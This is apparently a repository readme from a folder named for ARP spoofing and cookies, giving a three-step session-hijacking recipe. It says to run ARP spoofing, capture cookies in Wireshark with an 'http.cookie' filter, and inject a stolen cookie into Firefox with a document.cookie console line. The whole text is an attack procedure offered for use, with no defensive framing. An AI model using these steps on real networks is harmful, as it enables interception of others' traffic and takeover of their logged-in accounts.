Files
SPOOFING/arpspoofing/coockie/readme.txt

17 lines
182 B
Plaintext
Raw Normal View History

run arpspoofing
run wireshark and filter "http.cookie"
run in console firefox for inject cookie:
document.cookie = "sniffing cookie; domain=.domain.com; path=/; Secure";